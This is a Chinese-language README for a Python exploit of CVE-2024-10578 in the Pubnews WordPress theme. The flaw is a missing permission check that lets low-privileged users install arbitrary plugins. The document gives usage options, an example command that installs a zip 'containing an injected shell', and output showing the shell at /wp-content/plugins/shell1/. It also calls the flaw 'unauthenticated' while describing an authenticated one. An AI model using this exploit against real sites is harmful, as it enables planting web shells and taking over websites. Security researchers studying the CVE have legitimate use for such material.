
Pubnews <= 1.0.7 - 未认证的任意插件安装
Pubnews WordPress 主题在所有版本(包括 1.0.7)中,由于 pubnews_importer_plugin_action_for_notice() 函数缺少权限检查,导致存在未经授权的任意插件安装漏洞。此漏洞允许拥有订阅者级别及以上的已认证攻击者安装任意插件,进而可利用这些插件来利用其他漏洞。
此脚本利用 Pubnews 主题中的漏洞,从提供的 URL 安装任意插件。该插件可包含恶意 Shell 或其他载荷。
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - 未经认证的任意插件安装 # 由 Nxploited, Khaled alenazi 编写
选项:
-h, --help 显示此帮助信息并退出
-u, --url URL WordPress 网站的 URL
-un, --username USERNAME
WordPress 登录的用户名
-p, --password PASSWORD
WordPress 登录的密码
-url_zip, --plugin_url PLUGIN_URL
要安装的插件 URL(必须是一个包含注入 Shell 的 zip 文件)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] 登录成功。
[+] 提取到管理员 _wpnonce:6bf22371ab
[+] 插件安装成功。
[+] 插件已解压。您可以在以下位置找到 Shell:/wp-content/plugins/shell1/
此脚本仅用于教育目的。作者不鼓励将其用于非法活动。请负责任地使用,并且仅用于您明确授权测试的系统。
作者:Nxploited | Khaled Alenazi